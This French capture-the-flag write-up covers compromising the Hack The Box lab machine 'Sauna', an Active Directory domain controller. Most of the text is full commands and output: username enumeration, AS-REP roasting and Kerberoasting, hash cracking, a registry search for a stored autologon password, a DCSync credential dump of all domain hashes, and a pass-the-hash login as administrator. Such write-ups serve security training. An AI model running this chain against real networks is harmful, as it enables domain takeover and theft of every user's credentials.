# Sauna `ldap` `kerberos` `reg` `bloodhound` * Nom machine : Sauna * Difficulté : Facile * OS : Windows - AD ## Enumération ### NMAP ``` Nmap scan report for 10.10.10.175 Host is up (0.037s latency). PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 80/tcp open http Microsoft IIS httpd 10.0 |_http-server-header: Microsoft-IIS/10.0 |_http-title: Egotistical Bank :: Home | http-methods: |_ Potentially risky methods: TRACE 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-11 00:08:49Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found |_http-server-header: Microsoft-HTTPAPI/2.0 9389/tcp open mc-nmf .NET Message Framing Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows ``` ### LDAP ``` ┌──(kali㉿kali)-[~/htb] └─$ ldapsearch -x -H ldap://10.10.10.175 -D '' -w '' -b "DC=EGOTISTICAL-BANK,DC=local" # extended LDIF # # LDAPv3 # base with scope subtree # filter: (objectclass=*) # requesting: ALL # # EGOTISTICAL-BANK.LOCAL {...} # Builtin, EGOTISTICAL-BANK.LOCAL dn: CN=Builtin,DC=EGOTISTICAL-BANK,DC=LOCAL # Hugo Smith, EGOTISTICAL-BANK.LOCAL dn: CN=Hugo Smith,DC=EGOTISTICAL-BANK,DC=LOCAL # search reference ref: ldap://ForestDnsZones.EGOTISTICAL-BANK.LOCAL/DC=ForestDnsZones,DC=EGOTIST ICAL-BANK,DC=LOCAL # search reference ref: ldap://DomainDnsZones.EGOTISTICAL-BANK.LOCAL/DC=DomainDnsZones,DC=EGOTIST ICAL-BANK,DC=LOCAL # search reference ref: ldap://EGOTISTICAL-BANK.LOCAL/CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOC AL # search result search: 2 result: 0 Success # numResponses: 19 # numEntries: 15 # numReferences: 3 ``` Nous avons trouvé un utilisateur : hugo smith. Nous allons créer une liste de possible usernames, par exemple avec juste la première lettre puis le nom, avec un point ou non etc, puis allons la tester à l'aide de kerbrute. ``` ┌──(kali㉿kali)-[~/htb/sauna] └─$ /home/kali/kerbrute userenum -d EGOTISTICAL-BANK.LOCAL --dc 10.10.10.175 user.txt __ __ __ / /_____ _____/ /_ _______ __/ /____ / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \ / ,< / __/ / / /_/ / / / /_/ / /_/ __/ /_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/ Version: v1.0.3 (9dad6e1) - 11/10/24 - Ronnie Flathers @ropnop 2024/11/10 12:17:13 > Using KDC(s): 2024/11/10 12:17:13 > 10.10.10.175:88 2024/11/10 12:17:13 > [+] VALID USERNAME: hsmith@EGOTISTICAL-BANK.LOCAL 2024/11/10 12:17:13 > Done! Tested 5 usernames (1 valid) in 0.149 seconds ``` Il existe ! Nous n'avons pas pu l'exploiter, nous allons chercher d'autres noms d'utilisateurs. En énumarant la page web, on en trouve plusieurs. ``` fergus smith shaun coins bowie taylor sophie driver hugo bear steven kerb ``` Nous pouvons utiliser ce script python : {% embed url="" %} ou bien effectuer manuellement les modifications car nous savons que les comptes sont composés de la première lettre du prénom suivi du nom. ``` ┌──(kali㉿kali)-[~/htb] └─$ impacket-GetNPUsers EGOTISTICAL-BANK.LOCAL/ -dc-ip 10.10.10.175 -usersfile users.txt -format hashcat -outputfile hashes.txt Impacket v0.13.0.dev0+20241024.90011.835e1755 - Copyright Fortra, LLC and its affiliated companies $krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:63e114dda5dc307223ab101c621539ea$f5cf496ced63222dd0bfc64bfc60727f3e04fd0e684c759820bb8beba013069afd46b0f5549c9bd6571203588dd52edae4d231598b97e7924fc47c25d0bc19e1c34f7e56ca06539170e73e2527c6c583c890a5ba2dfe620e201f88dcdbe853aebe8c9ec7b530cc1423e4f29141221ac378587659a473342ad7e67d6f2a90931a7728562b6d2487e07b8fc7ae576a8094d3fde6a842d221fe385db609240f15b05bb4fae0e099261a714e364e3f4626b279e0a9af43a8a8d05733543884e745d0c598a50f47e9689622af1f1eee567edf13516b3163e07249039e510f3f1ba6717571e7b3d0af0ac081ff43cfa4260e0ade46adf07f4a74d5e102153eba998c71 [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) ``` Nous avons récupéré un hash ! ## Accès initial ``` ┌──(kali㉿kali)-[~/htb] └─$ john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt Using default input encoding: UTF-8 Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x]) Will run 5 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status Thestrokes23 ($krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL) 1g 0:00:00:09 DONE (2024-11-10 12:43) 0.1075g/s 1133Kp/s 1133Kc/s 1133KC/s Thomas30..TheLost18 Use the "--show" option to display all of the cracked passwords reliably Session completed. ``` Nous avons le mot de passe de l'utilisateur fsmith. On se connecte via winrm. ``` ──(kali㉿kali)-[~/htb] └─$ evil-winrm -u fsmith -p Thestrokes23 -i 10.10.10.175 Evil-WinRM shell v3.5 Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\FSmith\Documents> ``` ## Elévation des privilèges Nous allons énumérer à l'aide de bloodhound. ``` ┌──(kali㉿kali)-[~/htb/sauna] └─$ nxc ldap EGOTISTICAL-BANK.LOCAL -u fsmith -p Thestrokes23 --bloodhound --collection All --dns-server 10.10.10.175 SMB 10.10.10.175 445 SAUNA [*] Windows 10 / Server 2019 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False) LDAP 10.10.10.175 389 SAUNA [+] EGOTISTICAL-BANK.LOCAL\fsmith:Thestrokes23 LDAP 10.10.10.175 389 SAUNA Resolved collection methods: acl, session, dcom, localadmin, trusts, container, group, rdp, objectprops, psremote LDAP 10.10.10.175 389 SAUNA Done in 00M 08S LDAP 10.10.10.175 389 SAUNA Compressing output into /home/kali/.nxc/logs/SAUNA_10.10.10.175_2024-11-10_124811_bloodhound.zip ``` hsmith trouvé au début et finalement kerberoastable
``` ┌──(kali㉿kali)-[~/htb/sauna] └─$ impacket-GetUserSPNs EGOTISTICAL-BANK.LOCAL/fsmith:Thestrokes23 -dc-ip 10.10.10.175 -request Impacket v0.13.0.dev0+20241024.90011.835e1755 - Copyright Fortra, LLC and its affiliated companies ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation ---------------------------------------- ------ -------- -------------------------- --------- ---------- SAUNA/HSmith.EGOTISTICALBANK.LOCAL:60111 HSmith 2020-01-23 00:54:34.140321 [-] CCache file is not found. Skipping... $krb5tgs$23$*HSmith$EGOTISTICAL-BANK.LOCAL$EGOTISTICAL-BANK.LOCAL/HSmith*$b8a0b3a0f6df5c08234056b0a715e5fd$37b3a87398d2ea26d45feab0bca344bd302e29317263b20b7edace2e324a4d05b04ef15cef503032f3575504461120638acf4d712e578c68f386c2966adf4fdcff3ffa009c89dfce96e3232bd248d31d539b5ebde2b4e714852d4e2db59b887e4f79e8d70c3aaf1b7c77667bd7b9d8ced3613b77c203b7e812858577c74788d25e32680f0442d9a1b81983d0d27dfdb2122f70ccf6ddc267dd5e739b0185d6ccc651b8002e422d1d7cdf581135b4bd060d598f80a434aca2a2faf7ca2de0f0d55f0ede5bc5b3568e946b0d4aa11f9a228f7de708138d2cfe91458209a8502013b01669f4844f85bbcb29428298c83e30c979c6d0a1a150483054ed582e62a70891f1cd8602c62a89b6fd7bd505fa37add2308dfca4104d0148af07f34986dedef892efbb7c1d1b76e133768218192806824810c04937cf6d93b9c735175c63c39bdc7d7d868972db23629016917203f2d9e876060324df876862508beecfca36d2672c2c30dafb780833796b09f3207253d00518b29964d15fda8a4742016123bbe94b34b898f10039af01d9ddc6f3f672dc12478113d01200b3680ea9da32de38ec63ae05f81d617e91ffae3b782e6d71bd739cc49b10d7c9ab0c4af7dc7ad0152b06f401ce5eccb80201ed0174b491ed8e8f0652e365e32f19f00ee34430e2cb15503be4edfb48739b58eb5f8c76ec68373eb5e3cce2237af538d09603eaafb8f75d20c6cb0e0cf7c5f66f3af81d6fee2531179f91f5ae801f07e2f3f45c0f09af420f755b179575708d033b49d3875b9fb33d2324e85fe487480bff018b1627a32b83a14d0bcfb311d74d837f48e80cb5e4b16e7268690b587fcd86476715fdc095671bee1401bbe3722bc0c295194426e6567c92de0e80e4a6218ba297f26da4070bcd5d67278b34b67e738146dd4cac15128ee18bd5422287a383c887c43acff13eebde8134fc80291694d750bae482b93d879898897bad954f552495367eb74e1657d1a53f022142bd4e1541de064cc8d8c38bdfae8b4aedc47be9635e4061c7fc3bec18998e229348c9ea24c6079871313b171c97f6b062a502df0d88bc0a5dba6b9339b2c2b19f50dfffaac74bad0d5f0f9e4eeb045466465f5d8fc69c7c9be63290455b812ffc6e88bcaec94748d860d80171a221577eccc5f893927a5b17ee736e43f4c4d163ef91ab04934f424ddb148c64b65153ecc7130ddbe026863667f99bfb99e8bee5de3dc315850b3cccfdf740bac2b9ad565fd76261af41588622987b3b11cfa4495c0f40028bfc9e9daa20298dc2504385b383f386219d03fa1a5fc2e950cc79bcaa752ba2119c1470ef0a9c7496149e7eeae614c1521842fe8bf117b8f93a03a89eb6d9549d627a66637e988556f1090a16149f26d4e8cb6cb0d8 ``` ``` ┌──(kali㉿kali)-[~/htb/sauna] └─$ john hsmith.hash -wordlist=/usr/share/wordlists/rockyou.txt Using default input encoding: UTF-8 Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4]) Will run 5 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status Thestrokes23 (?) 1g 0:00:00:03 DONE (2024-11-10 12:54) 0.3257g/s 3433Kp/s 3433Kc/s 3433KC/s Thomas30..TheLost18 Use the "--show" option to display all of the cracked passwords reliably Session completed. ``` On retombe sur le même mot de passe. Nous quittons bloodhound et reprenons la session winrm. Notre objectif est de pivoter vers svc\_loanmgr, en effet il a les droits DCSync ce qui permettra de dump le hash de l'administrator.
``` *Evil-WinRM* PS C:\> reg query HKLM /f password /t REG_SZ /s HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0fafd998-c8e8-42a1-86d7-7c10c664a415} (Default) REG_SZ Picture Password Enrollment UX HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2135f72a-90b5-4ed3-a7f1-8bb705ac276a} (Default) REG_SZ PicturePasswordLogonProvider HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{24954E9B-D39A-4168-A3B2-E5014C94492F} (Default) REG_SZ OOBE Upgrade Password Page HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{29EA1611-529B-4113-8EE3-EE0F6DD2C715} (Default) REG_SZ RASGCW Change Password Class {...} HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\XWizards\Components\{d9162b5b-ca81-476e-a310-cb32d932733c} (Default) REG_SZ Password Expired UI Page HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon DefaultPassword REG_SZ Moneymakestheworldgoround! HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Capabilities\Roaming\FormSuggest FilterIn REG_SZ FormSuggest Passwords,Use FormSuggest,FormSuggest PW Ask ``` `DefaultPassword REG_SZ Moneymakestheworldgoround!` Nous le testons pour svc\_loanmgr et bingo ! Nous n'avons plus qu'à dump le hash de l'admin... ``` ┌──(kali㉿kali)-[~/htb/sauna] └─$ impacket-secretsdump svc_loanmgr:'Moneymakestheworldgoround!'@10.10.10.175 Impacket v0.13.0.dev0+20241024.90011.835e1755 - Copyright Fortra, LLC and its affiliated companies [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [*] Using the DRSUAPI method to get NTDS.DIT secrets Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c::: EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd::: EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd::: EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c::: SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:7229816c65b8d9efd10055c2b6a4c6b2::: [*] Kerberos keys grabbed Administrator:aes256-cts-hmac-sha1-96:42ee4a7abee32410f470fed37ae9660535ac56eeb73928ec783b015d623fc657 Administrator:aes128-cts-hmac-sha1-96:a9f3769c592a8a231c3c972c4050be4e Administrator:des-cbc-md5:fb8f321c64cea87f krbtgt:aes256-cts-hmac-sha1-96:83c18194bf8bd3949d4d0d94584b868b9d5f2a54d3d6f3012fe0921585519f24 krbtgt:aes128-cts-hmac-sha1-96:c824894df4c4c621394c079b42032fa9 krbtgt:des-cbc-md5:c170d5dc3edfc1d9 EGOTISTICAL-BANK.LOCAL\HSmith:aes256-cts-hmac-sha1-96:5875ff00ac5e82869de5143417dc51e2a7acefae665f50ed840a112f15963324 EGOTISTICAL-BANK.LOCAL\HSmith:aes128-cts-hmac-sha1-96:909929b037d273e6a8828c362faa59e9 EGOTISTICAL-BANK.LOCAL\HSmith:des-cbc-md5:1c73b99168d3f8c7 EGOTISTICAL-BANK.LOCAL\FSmith:aes256-cts-hmac-sha1-96:8bb69cf20ac8e4dddb4b8065d6d622ec805848922026586878422af67ebd61e2 EGOTISTICAL-BANK.LOCAL\FSmith:aes128-cts-hmac-sha1-96:6c6b07440ed43f8d15e671846d5b843b EGOTISTICAL-BANK.LOCAL\FSmith:des-cbc-md5:b50e02ab0d85f76b EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes256-cts-hmac-sha1-96:6f7fd4e71acd990a534bf98df1cb8be43cb476b00a8b4495e2538cff2efaacba EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes128-cts-hmac-sha1-96:8ea32a31a1e22cb272870d79ca6d972c EGOTISTICAL-BANK.LOCAL\svc_loanmgr:des-cbc-md5:2a896d16c28cf4a2 SAUNA$:aes256-cts-hmac-sha1-96:6f6ae06144ad16166c839625f8bc87eb799927d2cdc2b034b6696115069ee1f1 SAUNA$:aes128-cts-hmac-sha1-96:bd635396b8e727b9fa0417344b43a706 SAUNA$:des-cbc-md5:1a9d133bb0b920e9 [*] Cleaning up... ``` ``` ┌──(kali㉿kali)-[~/htb/sauna] └─$ evil-winrm -u administrator -H 823452073d75b9d1cf70ebdf86c7f98e -i 10.10.10.175 Evil-WinRM shell v3.5 Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\Administrator\Documents> ```